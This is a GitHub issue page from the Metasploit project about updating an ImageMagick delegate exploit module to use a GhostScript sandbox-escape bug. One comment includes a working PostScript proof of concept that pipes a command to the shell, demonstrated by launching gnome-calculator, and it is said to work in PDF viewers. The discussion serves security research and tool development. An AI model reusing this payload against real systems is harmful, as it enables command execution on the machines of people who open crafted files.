Metasploit-framework: Update ImageMagick delegate exploit with GhostScript 0day

Created on 28 Aug 2018  路  5Comments  路  Source: rapid7/metasploit-framework

Steps to reproduce

The ImagickMagick Delegate Arbitrary Command Excecution exploit is using a very old GhostScript exploit. It could be updated to use this 0day exploit:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1640

It can be exploited on Cent OS desktop from browser

feature module
Source
picture reedforte

Most helpful comment

Neat, I would recommend using this one for maximum coverage.

https://gist.github.com/taviso/e640fdcdd232887e2591752d31f903e5

I don't know ruby or I would help, sorry about that 馃槢

picture taviso on 29 Aug 2018
🎉3

All 5 comments

works in evince (gnome pdf reader) and okular (kde) too 

%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%gnome-calculator) currentdevice putdeviceprops
showpage
reedforte picture reedforte on 28 Aug 2018
🎉1

Yep, already on it. There's also exploit/unix/fileformat/ghostscript_type_confusion, which would be the closer of the two. I'm hoping to consolidate, but chances are we'll need a new module.

wvu-r7 picture wvu-r7 on 28 Aug 2018

Neat, I would recommend using this one for maximum coverage.

https://gist.github.com/taviso/e640fdcdd232887e2591752d31f903e5

I don't know ruby or I would help, sorry about that 馃槢

taviso picture taviso on 29 Aug 2018
🎉3

Thanks again, @taviso!

wvu-r7 picture wvu-r7 on 30 Aug 2018

PR is up. Sorry for the delay.

wvu-r7 picture wvu-r7 on 30 Aug 2018
Was this page helpful?
0 / 5 - 0 ratings

Related issues

handsomebeast picture handsomebeast  路  3Comments
0x27 picture 0x27  路  3Comments
adrianmihalko picture adrianmihalko  路  3Comments
fluit105 picture fluit105  路  3Comments
Sonya2010 picture Sonya2010  路  3Comments